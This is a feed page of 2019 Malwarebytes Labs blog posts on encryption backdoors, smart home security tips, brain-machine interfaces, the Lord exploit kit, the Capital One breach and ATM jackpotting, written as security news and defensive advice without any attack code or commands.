Techie Feeds

Backdoors are a security vulnerability

Malwarebytes - Fri, 08/09/2019 - 16:10

Last month, US Attorney General William Barr resurrected a government appeal to technology companies: Provide law enforcement with an infallible, “secure” method to access, unscramble, and read encrypted data stored on devices and sent across secure messaging services.

Barr asked, in more accurate, yet unspoken terms, for technology companies to develop encryption backdoors to their own services and products. Refusing to endorse any single implementation strategy, the Attorney General instead put the responsibility on cybersecurity researchers and technologists.  

“We are confident that there are technical solutions that will allow lawful access to encrypted data and communications by law enforcement without materially weakening the security provided by encryption,” Attorney General Barr said.

Cybersecurity researchers, to put it lightly, disagreed. To many, the idea of installing backdoors into encryption is antithetical to encryption’s very purpose—security.

Matt Blaze, cybersecurity researcher and University of Pennsylvania Distributed Systems Lab director, pushed back against the Attorney General’s remarks.

“As someone who’s been working on securing the ‘net for going on three decades now, having to repeatedly engage with this ‘why can’t you just weaken the one tool you have that actually works’ nonsense is utterly exhausting,” Blaze wrote on Twitter. He continued:

“And yes, I understand why law enforcement wants this. They have real, important problems too, and a magic decryption wand would surely help them if one could exist. But so would time travel, teleportation, and invisibility cloaks. Let’s stick to the reality-based world.”

Blaze was joined by a chorus of other cybersecurity researchers online, including Johns Hopkins University associate professor Matthew Green, who said plainly: “there is no safe backdoor solution on the table.”

The problem with backdoors is known—any alternate channel devoted to access by one party will undoubtedly be discovered, accessed, and abused by another. Cybersecurity researchers have repeatedly argued for years that, when it comes to encryption technology, the risk of weakening the security of countless individuals is too high.

Encryption today

In 2014, Apple pushed privacy to a new standard. With the launch of its iOS 8 mobile operating system that year, no longer would the company be able to access the encrypted data stored on its consumer devices. If the company did not have the passcode to a device’s lock screen, it simply could not access the contents of the device.

“On devices running iOS 8, your personal data such as photos, messages (including attachments), email, contacts, call history, iTunes content, notes, and reminders is placed under the protection of your passcode,” the company said.

The same standard holds today for iOS devices, including the latest iPhone models. Data that lives on a device is encrypted by default, and any attempts to access that data require the device’s passcode. For Android devices, most users can choose to encrypt their locally-stored data, but the feature is not turned on by default.

Within two years of the iOS 8 launch, Apple had a fight on its hands.

Following the 2015 terrorist shooting in San Bernardino, Apple hit an impasse with the FBI, which was investigating the attack. Apple said it was unable to access the messages sent on an iPhone 5C device that was owned by one of the attackers, and Apple also refused to build a version of its mobile operating system that would allow law enforcement to access the phone.

Though the FBI eventually relied on a third-party contractor to crack into the iPhone 5C, since then, numerous messaging apps for iOS and Android have provided users with end-to-end encryption that locks even third-party companies out from accessing sent messages and conversations.

Signal, WhatsApp, and iMessage all provide this feature to users.

Upset by their inability to access potentially vital evidence for criminal investigations, the federal government has, for years, pushed a campaign to convince tech companies to build backdoors that will, allegedly, only be used by law enforcement agencies.

The problem, cybersecurity researchers said, is that those backdoors do not stay reserved for their intended use.

Backdoor breakdown

In 1993, President Bill Clinton’s Administration proposed a technical plan to monitor Americans’ conversations. Installed within government communications networks would be devices called “Clipper Chips,” which, if used properly, would only allow law enforcement agencies to listen in on certain phone calls.

But there were problems, as revealed by Blaze (the same cybersecurity researcher who criticized Attorney General Barr’s comments last month).  

In a lengthy analysis of the Clipper Chip system, Blaze found glaring vulnerabilities, such that the actual, built-in backdoor access could be circumvented.   

By 1996, adoption of the Clipper Chip was abandoned.

Years later, cybersecurity researchers witnessed other backdoor failures, and not just in encryption.

In 2010, the cybersecurity expert Steven Bellovin—who helped Blaze on his Clipper Chip analysis—warned readers of a fiasco in Greece in 2005, in which a hacker took advantage of a mechanism that was supposed to only be used by police.

“In the most notorious incident of this type, a cell phone switch in Greece was hacked by an unknown party. The so-called ‘lawful intercept’ mechanisms in the switch—that is, the features designed to permit the police to wiretap calls easily—was abused by the attacker to monitor at least a hundred cell phones, up to and including the prime minister’s,” Bellovin wrote. “This attack would not have been possible if the vendor hadn’t written the lawful intercept code.”

In 2010, cybersecurity researcher Bruce Schneier placed blame on Google for suffering a breach from reported Chinese hackers who were looking to see which of its government agents were under surveillance from US intelligence.

According to Schneier, the Chinese hackers were able to access sensitive emails because of a fatal flaw by Google—the company put a backdoor into its email service.

“In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts,” Schneier said. “This feature is what the Chinese hackers exploited to gain access.”

Interestingly, the insecurity of backdoors is not a problem reserved for the cybersecurity world.

In 2014, The Washington Post ran a story about where US travelers’ luggage goes once it gets checked into the airport. More than 10 years earlier, the Transpiration Security Administration had convinced luggage makers to install a new kind of lock on consumer bags—one that could be unlocked through a physical backdoor, accessible by using one of seven master keys which only TSA agents were supposed to own. That Washington Post story, though, revealed a close-up photograph of all seven keys.

Within a year, that photograph of the keys had been analyzed and converted into 3D printing files that were quickly shared online. The keys had leaked, and the security of nearly every single US luggage bag had been compromised. The very first flaw only required human error.

Worth the risk?

Attorney General Barr’s comments last month are part of a long-standing tradition in America, in which a representative of the Department of Justice (last year it was then-Deputy Attorney General Rod Rosenstein) makes a public appeal to technology companies, asking them to install backdoors as a means to preventing potential crime.

The arguments on this have lasted literal decades, invoking questions of the First Amendment, national security, and the right to privacy. That argument will continue, as it has today, but encryption may pick up a few surprising defenders along the way.

On July 23 on Twitter, the chief marketing officer of a company called SonicWall posted a link to a TechCrunch article about the Attorney General’s recent comments. The CMO commented on the piece:

“US attorney general #WilliamBarr says Americans should accept security risks of #encryption #backdoors

Michael Hayden, the former director of the National Security Agency—the very agency responsible for mass surveillance around the world—replied:

“Not really. And I was the director of national security agency.”

The fight to install backdoors is a game of cat-and-mouse: The government will, for the most part, want its own way to decrypt data when investigating crimes, and technologists will push back on that idea, calling it dangerous and risky. But as more major companies take the same stand as Apple—designing and building an incapability to retrieve users’ data—the public might slowly warm up to the idea, and value, of truly secure encryption.

The post Backdoors are a security vulnerability appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Labs quarterly report finds ransomware’s gone rampant against businesses

Malwarebytes - Thu, 08/08/2019 - 14:00

Ransomware’s back—so much so that we created an entire report on it.

For 10 quarters, we’ve covered cybercrime tactics and techniques, covering a wide range of threats we saw lodged against consumers and businesses through our product telemetry, honeypots, and threat intelligence. We’ve looked at dangerous Trojans such as Emotet and TrickBot, the explosion and subsequent downfall of cryptomining, trends in Mac and Android malware, and everything in between.

But this quarter, we noticed one threat dominating the landscape so much that it deserved its own hard look over a longer period than a single quarter. Ransomware, which many researchers have noted took a long breather after its 2016 and 2017 heyday, is back in a big way—targeting businesses with fierce determination, custom code, and brute force.

Over the last year, we’ve witnessed an almost constant increase in business detections of ransomware, rising a shocking 365 percent from Q2 2018 to Q2 2019.

Therefore, this quarter, our Cybercrime Tactics and Techniques report is a full ransomware retrospective, looking at the top families causing the most damage for consumers, businesses, regions, countries, and even specific US states. We examine increases in attacks lodged against cities, healthcare organizations, and schools, as well as tactics for distribution that are most popular today. We also look at ransomware’s tactical shift from mass blanket campaigns against consumers to targeted attacks on organizations.

To dig into the full report, including our predictions for ransomware of the future, download the Cybercrime Tactics and Techniques: Ransomware Retrospective here.

The post Labs quarterly report finds ransomware’s gone rampant against businesses appeared first on Malwarebytes Labs.

Categories: Techie Feeds

8 ways to improve security on smart home devices

Malwarebytes - Wed, 08/07/2019 - 15:00

Every so often, a news story breaks that hackers have made their way into a smart home device and stolen personal data. Or that vulnerabilities in smart tech have been discovered that allow their producers (or other cybercriminals) to spy on customers. We’ve seen it play out over and over with smart home assistants and other Internet of Things (IoT) devices, yet sales numbers for these items continue to climb.

Let’s face it: No matter how often we warn about the security concerns with smart home devices, they do make life more convenient—or at the very least, are a lot of fun to play with. It’s pretty clear this technology isn’t going away. So how can those who’ve embraced smart home technology do so while staying as secure as possible?

Here are eight easy ways to tighten up security on smart home devices so that users are as protected as possible while using the new technologies they love.

1. Switch up your passwords

Most smart home devices ship with default passwords. Some companies require that you change the default password before integrating the technology into your home—but not all. The first thing users can do to ensure hackers can’t brute force their way into their smart home device is change up the password, and make it something that is unique to that device. Once a hacker finds out one password, they’ll try to use it on every other account.

A few ways you can do to create less hackable passwords are:

  • Making them longer than eight characters
  • Creating passwords that are unrelated to pets, kids, birthdays, or other obvious combinations
  • Using a password manager so you don’t have to remember 27 different passwords
  • Using a password generator to create random combinations
2. Enable two-step authentication

Many online sites and smart devices are now allowing users to opt into two-step authentication, which is a two-step process for verifying information before allowing someone access to your account.

If you use a Chromecast or any other Google device, you can turn on this verification and receive email alerts. While you may be the only person to try logging into your account, it helps to know you’ll be notified if someone does try to hack in and get your information.

3. Disable unused features

Smart home tech, like the Amazon Echo or Google Nest, have made headlines for invasively recording users without their knowledge or shipping with unknown features, such as a microphone, that are later enabled. This makes trusting those devices implicitly a bit of a hazard.

While your voice assistant won’t be recording you all the time, it can be triggered by words used in a conversation between two people. Check your home assistant’s logs and delete your voice recordings if you find any you don’t approve of.

You can always turn off the voice control features on these devices. While their purpose is to respond to vocal commands, they can also be accessed through an app, remotely, or through a website instead.

4. Upgrade your devices

When was the last time you purchased smart tech for your home? If it was long enough ago that software updates are no longer compatible with the operating system, it might be time to upgrade.

Upgraded tech will always have new features, fewer malfunctions of previously cutting-edge but now standard innovations, plus more advanced ways to secure the device that may not be available on earlier models.

Another benefit of upgrading is that there are far more players on the market today than there were just a couple years ago. For example, many people use smart plugs to control their electricity usage, but not every brand considers security a top priority. Keep an eye on those that have received positive reviews by tech and science businesses. They’ll have fewer security issues than older models.

5. Check for software updates

Don’t worry if you don’t have the money for a big smart home upgrade right now. Many times, keeping software updated will do the trick—especially because security issues are most often fixed in periodic software updates, and not necessarily addressed in brand-new releases. Each new version of software released includes not only new functionality, but fixes to bugs and security patches.

These patches work to plug any known vulnerabilities in the smart device that allow for hackers to drop malware or steal valuable data. To make sure your device’s software is always updated, go into your settings to make sure to select automatic software updates. If that’s not possible, set reminders to check for updates yourself at least once per month.

6. Use a VPN

If you have concerns about the security of your ISP’s Wi-Fi network, you might consider using a VPN. A virtual private network (VPN) creates a closed system from any Internet connection, including public ones where you’re most at risk.

A VPN keeps your Internet protocol (IP) address from being discovered. This prevents hackers from knowing your location and also makes your Internet activity untraceable.

Perhaps the most important benefit of using a VPN is that it creates secured, encrypted connections. No matter where you access Wi-Fi—say if you wanted to turn on the air-conditioning at home from the airport—a VPN keeps that traffic secure.

7. Monitor your data

Are your devices sending you reports on energy usage or the top songs you played at home this month? Are you storing or backing up smart home data on the cloud? If not, where does that data go and how is it secured?

Smart home devices may not have easy instructions for determining whether data produced from their usage is stored on the cloud or on private, corporate-facing servers. Rest assured that, whether it’s visible or not, smart device companies are collecting data, whether to improve their marketing efforts or simply to show their own value.

So how can users monitor how their data is collected, stored, and transmitted? Some devices may allow you to back up info to the cloud in settings. If so, you should create strong passwords with two-factor authentication in order to access that data and protect it from hackers. If not, you might need to dig through a device’s EULA or even contact the company to find out how they store the data at rest and at transit, and whether that data is encrypted to ensure anonymity.

If you’d prefer not to let your smart tech back up information to the cloud, you can often manually turn this off in settings. The question still remains: What happens to your data if it’s not in the cloud? That’s where poking around the company’s website or calling them to learn how personal information is stored can hopefully calm your fears.

8. Limit smart home device usage

The only way to guarantee your privacy and security at home is to avoid using devices that connect to the Internet—including your phone. Obviously, in today’s world, that’s a difficult task. Therefore, the second-best option is to consider which devices are absolutely necessary for work, pleasure, and convenience, and slim down the list of smart-enabled devices.

Perhaps it makes sense for an energy-conscious person to use a Nest device to regulate temperatures, but do they need Internet-connected smoke detectors? Maybe some folks couldn’t live without streaming, but could get by using a tradition key over a smart lock.

There’s no such thing as 100 percent protection from cybercrime—even if you don’t use the Internet. So if you want to embrace the wonders of smart home technology, be sure you’re smart about how and when you use it.

The post 8 ways to improve security on smart home devices appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 29 – August 4)

Malwarebytes - Mon, 08/05/2019 - 15:44

Last week on Malwarebytes Labs we discussed the security and privacy changes in Android Q, how to get your Equifax money and stay safe doing it, and we looked at the strategy of getting a board of directors to invest in government cybersecurity. We also reviewed how a Capital One breach exposed over 100 million credit card applications, analyzed the exploit kit activity in the summer of 2019, and warned users about a QR code scam that can clean out your bank account.

The busy week in security continued with looks at Magecart and others intensifying web skimming, ATM attacks and fraud, and an examination of the Lord Exploit Kit.

Other cybersecurity news
  • The Georgia State Patrol was reportedly the target of a July 26 ransomware attack that has necessitated the precautionary shutdown of its servers and network. (Source: SC Magazine)
  • Houston County Schools in Alabama delayed the school year’s opening scheduled for August 1st due to a malware attack. (Source: Security Affairs)
  • Over 95% of the 1,600 vulnerabilities discovered by Google’s Project Zero were fixed within 90 days. (Source: Techspot)
  • Researchers who discovered several severe vulnerabilities now uncovered two more flaws that could allow attackers to hack WPA3 protected WiFi passwords. (Source: The Hacker News)
  • Germany’s data protection commissioner investigates revelations that Google contract-workers were listening to recordings made via smart speakers. (Source: The Register)
  • Experts tend to recommend anti-malware protection for all mobile device users and platforms , but 47% of Android Anti-Malware apps are flawed. (Source: DarkReading)
  • Many companies don’t know the depth of their IoT-related risk exposure. (Source: Help Net Security)
  • Apple’s Siri follows Amazon Alexa and Google Home in facing backlash for its data retention policies. (Source: Threatpost)
  • There has been a 92% increase in the total number of vulnerabilities reported in the last year, while the average payout per vulnerability increased this year by 83%. (Source: InfoSecurity magazine)
  • Multiple German companies were off to a rough start last week when a phishing campaign pushing a data-wiping malware dubbed GermanWiper targeted them and asked for a ransom. (Source: BleepingComputer)

Stay safe, everyone!

The post A week in security (July 29 – August 4) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How brain-machine interface (BMI) technology could create an Internet of Thoughts

Malwarebytes - Mon, 08/05/2019 - 15:00

She plugged the extension for car transportation in the brain-machine interface connectors at the right side of her head, and off she went. The traffic was relatively slow, so there was no need to stop working. She answered a few more emails, then unplugged her work extension. Weekend mode could now be initiated. How about we play a game? her AI BrainPal companion, Phoenix, suggested. Or would you rather sit back and enjoy the ride?

Too futuristic? A Scalzi rip-off? Sci-fi that’s really more of a fantasy? Sure, it’s not technology that’s ready to ship, but driving a car while writing emails or playing video games—all while being physically paralyzed—is a future not-too-far-off. And no, we’re not talking about self-driving cars.

Brain-machine interface (BMI) technology is a field in which dedicated, big-name players are looking to develop a wide variety of applications for establishing a direct communication pathway between the brain (wired or enhanced) and an external device. Some of these players are primarily interested in healthcare-centric implementations, such as enabling paralyzed humans to use a computer, but for others, improving the lives of the disabled are simply short-term goals on the road to much more broad and far-reaching accomplishments.

One such application of BMI, for example, is the development of a Human Brain/Cloud Interface (B/CI), which would enable people to directly access information from the Internet, store their learnings on the cloud, and work together with other connected brains, whether they are human or artificial. B/CI, often referred to as the Internet of Thoughts, imagines a world where instant access to information is possible without the use of external machinery, such as desktop computers or Internet cables. Search and retrieval of information will be initiated by thought patterns alone.

So exactly how does brain-machine interface technology work? And how far off are we from seeing it applied in the real world? We take a look at where the technology stands today, our top concerns—both for security and ethical reasons—and how BMI could be implemented for optimal results in the future.

Brain-machine interface technology today

At some level, brain-machine interface technology already exists today.

For example, there are hearing aids that take over the function of the ears for people that are deaf or hard of hearing. These hearing aids connect to the nerves that transmit information to the brain, helping people translate sound they’d otherwise be unable to process. There are also several methods that allow mute or paralyzed people to communicate with others, although those methods are still crude and slow.

However, organizations are moving quickly to transform BMI technology from theoretical to practical. Many of the methods we’ll discuss below have already been tested on animals and are waiting for approval to be tested on humans.

One company working on technology to link the brain to a computer is Elon Musk’s startup Neurolink, which expects to be testing a system that feeds thousands of electrical probes into the human brain around 2020. Neuralink’s initial goal is to help people deal with brain and spinal cord injuries or congenital defects. After all, such a link would enable patients to use an exoskeleton. But the long-term goal is to accomplish a brain-to-machine interface that could achieve a symbiosis of human and artificial intelligence.

Working from a different angle are companies like Intel, IBM, and Samsung. Intel is trying to mimic the functionality of a brain by using neuromorphic engineering. This means they are building machines that work in the same way a biological brain works. Where traditional computing works by running numbers through an optimized pipeline, neuromorphic hardware performs calculations using artificial “neurons” that communicate with each other.

These are two wildly different techniques that are both optimized for different methods of computing. Neural networks, for example, excel at recognizing visual objects, so they would be better at facial recognition and image searches. Neuromorphic design is still in the research phase, but this and similar projects from competitors such as IBM and Samsung should break ground for eventual commoditization and commercial use. These projects might be able to provide a faster and more efficient interface between a real brain and a binary computer.

Using a technique called “neuralnanorobotics” neuroscientists have expressed they expect connections that are a lot more advanced to be possible within decades from now. While the technology is mainly being developed to facilitate accurate diagnoses and eventual cures for the hundreds of different conditions that affect the human brain, it also offers options in a more technological direction.

The human brain is an amazing computer

At a possible transmission speed racking up to ∼6 × 10^16 bits per second, the human brain is able to relay an incredible amount of information super fast. To compare, that is 60,000 Terabit per second or 7,500 Terabyte per second, which is a lot faster than the fastest stable Internet connection (1.6 Terabits per second) over a long distance recorded to date. This means that in our coveted brain-to-Cloud connection, the Internet would be the speed-limiting factor.

However, it’s most likely that the devices we are going to need to transform one kind of data into another will determine the speed at which BMI technology operates.

Beyond speed, there are other limiting factors that result in a technological mismatch for pairing brains and computers. Neuromorphic engineering is based on aligning the differences between the computers we are used to working with and biological brains. Neuromorphic engineers try to build computers that resemble a more human-like brain with a special type of chip. Of course, it is possible to mimic the functioning of the brain by using regular chips and special software, but this process is inefficient.

The main difference between logical and biological computers is in the number of possible connections. Simply put, if you want to match the thousands of possible connections that neurons can make, it takes a huge number of transistors. Enter: specially-crafted chips whose architecture resembles the human brain.

Yet, for all the brain’s marvels, speed, and thousands of neurons making connections and relying information, we are human after all, which means multiple flawed outcomes can result from those connections.

Know that frustrating feeling when you see a familiar face you’ve passed by hundreds of times, but can’t remember her name? Or hear a tune you’ve hummed endlessly for weeks, but don’t remember the lyrics? The number of connections a neuron can make does not always lead directly to the right answer. Sometimes, we are distracted or overwrought or we simply cannot retrieve known information from whichever location it’s been stored.

What if you could put a computer to work at such a moment? Computers do not forget information unless you delete it—and even then, it can sometimes be found. Now add the cloud and Internet connectivity, and suddenly, you’ve got an eidetic memory. It’d be like being able to Google something instantaneously in your head.

Should humans be wired to machines?

As we have shown, researchers are following several paths to determine applications for connecting our brains to the digital world, and they are considering the strengths and weaknesses of each as they attempt to achieve a symbiotic relationship. Whether it’s an exoskeleton that allows a paralyzed person to walk, Artificial Intelligence-powered computers that can ramp up on speed and visual capabilities, or connecting our brains to the Internet and the Cloud for storing and sharing information, the applications for BMI technology are nearly endless.

I’m sure this research can be of great benefit to handicapped people, enabling them to easier use appliances and devices, move around more freely, or communicate easier. And maybe one or more of these technologies could even bring relief to those suffering from mental health diseases or learning disabilities. In those cases, you will hear no argument from me, and I will applaud every step of progress made. But before I have my brain connected to the Internet, a lot of other requirements will have to be met.

For one, there are countless concerns about the ethical development of this technology. What is happening to the animals that are being tested? How would we determine the best way to move forward on testing humans? Is there a point of no return where once we hit a certain threshold, we lose control—and the computer or AI gains it? At which point do we stop and think: Okay, we know we can do this, but should we?

From a practical standpoint alone, there are some questions that need answering. For example, Bluetooth would be sufficient to control the medical applications, so why would we have to be hardwired to the Internet?

What is stopping brain-machine interface technology development today?

From where we are now in technology’s development, we see a few hurdles that will need to be jumped to move these techniques into a fully functional BMI. At a high level:

  • Progress needs to be made on developing smaller specialized computer chips that are capable of a multitude of connections. Remember, the first computers were the size of a whole room. Now, they fit in our pocket.
  • The research conducted in these fields will undoubtedly teach us more about the human brain, but there is so much we still don’t know. Will what we uncover about the brain be enough to successfully connect it to a machine? Or will what we don’t know hinder us or put us in danger in the end?
  • Approval from regulatory bodies like the FTC (Federal Trade Commission), law makers, and human rights organizations will be necessary to start testing on humans and expanding development into commercially viable products.

But there are more reasons that would stop me from using a BMI, even when the above points have been addressed:

  • Not everything you find on the Internet is true, so we would need some type of filter beyond search ranking to determine which information gets “downloaded” into people’s brains. How would we do so objectively? How could we simplify this without looking at a screen of search results, headlines, sources, and meta descriptions? Where does advertising come into play?
  • The combination of healthcare and cybersecurity has never been one that favors the security side. How will BMI integrate with hospital systems that use legacy software? What are the implications of someone actually hacking your brain?
  • Privacy will be a huge issue, since a cloud-connected brain could accidentally transmit information we’d rather keep to ourselves. I cannot control my thoughts, but I do like to control which ones I speak out loud, and which are published on the Internet.
  • The good old fear of the unknown, I will readily admit. We just don’t know what we don’t know. But who knows, maybe someday it will be as normal as having a smart phone.
What could stop us a few decades from now?

Let’s suppose we are able to work out all the high-level issues with privacy, security, filtering fact from fiction, and even learning all there is to know about the human brain. In a couple decades, we might have BMI in a place where we can conceivably release it to the public. There would still be kinks to iron out before this technology is ready for mass adoption. They include:

  • The cost of development will weigh heavily on the first use-cases. That means, quite simply, that the first people with access to BMI tech will likely be those with considerable wealth. With a widening gap between the haves and the have-nots today, how much further will this divide civilization when the top 1 percent not only control the majority of money, land, and media on the planet, but now they have super-powered brains?! Only mass production will make this sort of technology available to a larger part of the population.
  • The early adopters would be equipped with a super power, for all intents and purposes. Imagine interacting with a person that actually has all of human knowledge readily available. What will this do to working relationships? Friendships, marriages, or families? Outside of the economic imbalance mentioned above, what sort of sociological impact will result from BMI being unleashed?
  • Physical dangers are inherent when we directly connect devices of any sort to our bodies, and especially to our fragile brains. What are the possible effects of a discharge of static electricity directly into our brain?
Security concerns

Given that the path to the Internet of Thoughts seems destined to include medical research, discoveries, and applications, we fear that security will be implemented as an afterthought, at best. Healthcare has struggled as an industry to keep up with cybersecurity, with hospital devices or computers often running legacy software or institutions leaking sensitive patient data on the open Internet.

Where we already see healthcare technologies with the capability to improve quality of life (or even save lives) hurried through the development process without properly implementing security best practices, we shiver at the prospect of inheriting these poor programming and implementation habits when we start creating connections between the brain and the Internet.

Consider the implications if cybercriminals could hack into a high-ranking official’s BMI because of security vulnerabilities left unattended. One missed update could mean national security is now compromised. Imagine what an infected BMI might look like? Could criminals launch zombie-like attacks against communities, controlling people’s actions and words? Could they hold important information like passwords or your child’s birthday for ransom, locking you out of those memories forever if you don’t fork over? Could they extort celebrities or politicians for their private thoughts?

As a minor note and at the very least, I would certainly recommend using short-range connections like BlueTooth to develop medical applications for brain-machine interface. That might improve the chances of establishing a secure B/CI protocol for applications that require an Internet connection.

However, the main concern with BMI technology is not whether we’re capable of producing it, or even which applications of BMI deserve our attention. It’s that the Internet of Thoughts will become a dangerous and dark experiment that forever alters the way we humans communicate and interact. How can we be civil when our peers have access to our very thoughts—abstract or grim or judgmental or otherwise? What happens when those who cannot afford BMI attempt to compete with those that do? Will they simply get left behind?

When we connect our brain to a machine, are we even still human?

Questions to consider as this fairly new technology gains traction. In the meantime, stay safe everyone!

The post How brain-machine interface (BMI) technology could create an Internet of Thoughts appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Say hello to Lord Exploit Kit

Malwarebytes - Fri, 08/02/2019 - 18:15

Just as we had wrapped up our summer review of exploit kits, a new player entered the scene. Lord EK, as it is calling itself, was caught by Virus Bulletin‘s Adrian Luca while replaying malvertising chains.

In this blog post, we do a quick review of this exploit kit based on what we have collected so far. Malwarebytes users were already protected against this attack.

Exploit kit or not?

Lately there has been a trend of what we call pseudo-exploit kits, where a threat actor essentially grabs a proof of concept for an Internet Explorer or Flash Player vulnerability and crafts a very basic page to load it. It is probably more accurate to describe these as drive-by download attacks, rather than exploit kits.

With an exploit kit we expect to see certain feature sets that include:

  • a landing page that fingerprints the machine to identify client side vulnerabilities
  • dynamic URI patterns and domain name rotation
  • one or more exploits for the browser or one of its plugins
  • logging of the victim’s IP address
  • a payload that may change over time and that may be geo-specific
Quick glance at Lord EK

The first tweet from @adrian__luca about Lord EK came out in the morning of August 1st and shows interesting elements. It is part of a malvertising chain via the PopCash ad network and uses a compromised site to redirect to a landing page.

We can see a very rudimentary landing page in clear text with a comment at the top left by its author that says: <!– Lord EK – Landing page –>. By the time we checked it, it had been obfuscated but remained essentially the same.

There is a function that checks for the presence and version of the Flash Player, which will ultimately be used to push CVE-2018-15982. The second part of the landing page collects information that includes the Flash version and other network attributes about the victim.

Interesting URI patterns

One thing we immediately noticed was how the exploit kit’s URLs were unusual. We see the threat actor is using the ngrok service to craft custom hostnames (we informed ngrok of this abuse of their service by filing a report).

This is rather unusual at least from what we have observed with exploit kits in recent history. As per ngrok’s documentation, it exposes a local server to the public internet. The free version of ngrok generates randoms subomains which is almost perfect (and reminds us of Domain Shadowing) for the exploit kit author.

Flash exploit and payload

At the time of writing, Lord EK only goes for Flash Player, and not Internet Explorer vulnerabilities. Nao_Sec quickly studied the exploit and pointed out it is targeting CVE-2018-15982.

After exploiting the vulnerability, it launches shellcode to download and execute its payload:

The initial payload was njRAT, however the threat actors switched it the next day for the ERIS ransomware, as spotted by @tkanalyst.

We also noticed another change where after exploitation happens, the exploit kit redirects the victim to the Google home page. This is a behavior that was previously noted with the Spelevo exploit kit.

Under active development

It is still too early to say whether this exploit kit will stick around and make a name for itself. However, it is clear that its author is actively tweaking it.

This comes at a time when exploit kits are full of surprises and gaining some attention back among the researchers community. Even though the vulnerabilities for Internet Explorer and Flash Player have been patched and both have a very small market share, usage of the old Microsoft browser still continues in many countries.

Brad Duncan from Malware Traffic Analysis has posted some traffic captures for those interested in studying this exploit kit.

Indicators of Compromise

Compromised site


Network fingerprinting


Lord EK URI patterns




Eris ransomware


The post Say hello to Lord Exploit Kit appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Capital One breach exposes over 100 million credit card applications

Malwarebytes - Fri, 08/02/2019 - 16:00

Just as we were wrapping up the aftermath of the Equifax breach—how was that already two years ago?—we are confronted with yet another breach of about the same order of magnitude.

Capital One was affected by a data breach in March. The hacker gained access to information related to credit card applications from 2005 to early 2019 for consumers and small businesses. According to the bank the breach affected around 100 million people in the United States and about 6 million people in Canada.

What’s very different in this breach is that a suspect has already been apprehended. On top of that, the suspect admitted she acted illegally and disclosed the method she used to get hold of the data. From the behavior of the suspect you would almost assume she wanted to get caught. She put forth only a minimal effort to hide her identity when she talked about having access to the data, almost bragging online about how much she had been able to copy.

What happened?

A former tech company software engineer that used to be employed by Amazon Web Services (AWS) was storing the information she gained from the breach in a publicly accessible repository. AWS is the cloud hosting company that Capital One was using. From the court filings we may conclude that Paige Thompson used her hands-on knowledge of how AWS works and combined it with exploiting a misconfigured web application firewall. As a result, she was able to copy large amounts of data from the AWS buckets. She posted about having this information on several platforms which lead to someone reporting the fact to Capital One. This led to the investigation of the breach and the arrest of the suspect.

How should Capital One customers proceed?

Capital One has promised to reach out to everyone potentially affected by the breach and to provide free credit monitoring and identity protection services. While Capital One stated that no log-in credential were compromised, it wouldn’t hurt to change your password if you are a current customer or you recently applied for a credit card with the company. For other useful tips, you can read our blogpost about staying safe in the aftermath of the Equifax breach. You will find a wealth of tips to stay out of the worst trouble. Also be wary of the usual scams that will go online as spin-offs from this breach.

What can other companies learn from this incident?

While the vulnerability has been fixed, there are other lessons to be learned from this incident.

Even though it is impractical for companies the size of Capital One to run their own web services, we can ask ourselves if all of the sensitive information needs to be stored in a place where we do not have full control. Companies like Capital One use these hosting services for scalability, redundancy, and protection. One of the perks is that employees all over the world can access, store, and retrieve any amount of data. This can also be the downside in cases of disgruntled employees or misconfigured Identity & Access Management (IAM) services. Anyone that can successfully impersonate an employee with access rights can use the same data for their own purposes. Amazon Elastic Compute Cloud (EC2) is a web-based service that allows businesses to run application programs in the AWS public cloud. When you run the AWS Command Line Interface from within an Amazon EC2 instance, you can simplify providing credentials to your commands. From the court filings it looks as if this is where the vulnerability was exploited for.

Companies using AWS and similar cloud hosting services should pay attention to:

  • IAM provisioning: Be restrictive when assigning IAM roles so access is limited to those that need it and taken away from those that no longer need it.
  • Instance metadata: Limit access to EC2 metadata as these can be abused to assume an IAM role with permissions that do not belong to the user.
  • Comprehensive monitoring: While monitoring is important for every server and instance that holds important data, it is imperative to apply extra consideration to those that are accessible via the internet. Alarms should have gone off as soon as TOR was used to access the EC2.
  • Misconfigurations: If you do not have the in-house knowledge or want to doublecheck, there are professional services that can scan for misconfigured servers.

Ironically, Capital One has released some very useful open source tools for AWS compliance and has proven to have the in-house knowledge. Capital One has always been more on the Fintech side than most traditional banks, and they were early adopters of using the Cloud.  So, the fact that this breach happened to them is rather worrying as we would expect other banks to be even more vulnerable.

Stay posted

Even though we already know a lot more details about this data breach than usual, we will follow this one as it further unravels.

If you want to follow up directly with a few resources, you can click below:

Official Capital One statement

Paige Thompson Criminal Complaint

The post Capital One breach exposes over 100 million credit card applications appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Everything you need to know about ATM attacks and fraud: part 2

Malwarebytes - Fri, 08/02/2019 - 15:00

This is the second and final installment of our two-part series on automated teller machine (ATM) attacks and fraud.

In part 1, we identified the reasons why ATMs are vulnerable—from inherent weaknesses of its frame to its software—and delved deep into two of the four kinds of attacks against them: terminal tampering and physical attacks.

Terminal tampering has many types, but it involves either physically manipulating components of the ATM or introducing other devices to it as part of the fraudulent scheme. Physical attacks, on the other hand, cause destruction to the ATM and to the building or surrounding area where the machine is situated.

We have also supplied guidelines for users—before, during, and after—that will help keep them safe when using the ATM.

For part 2, we’re going to focus on the final two types of attacks: logical attacks and the use of social engineering.

Logical ATM attacks

As ATMs are essentially computers, fraudsters can and do use software as part of a coordinated effort to gain access to an ATM’s computer along with its components or its financial institution’s (FI’s) network. They do this, firstly, to obtain cash; secondarily, to retrieve sensitive data from the machine itself and strip or chip cards; and lastly, intercept data they can use to conduct fraudulent transactions.

Enter logical attacks—a term synonymous with jackpotting or ATM cash-out attacks. Logical attacks involve the exploitation and manipulation of the ATM’s system using malware or another electronic device called a black box. Once cybercriminals gain control of the system, they direct it to essentially spew cash until the safe empties as if it were a slot machine.

The concept of “jackpotting” became mainstream after the late renowned security researcher Barnaby Jack presented and demoed his research on the subject at the Black Hat security conference in 2010. Many expected ATM jackpotting to become a real-world problem since then. And, indeed, it has—in the form of logical attacks.

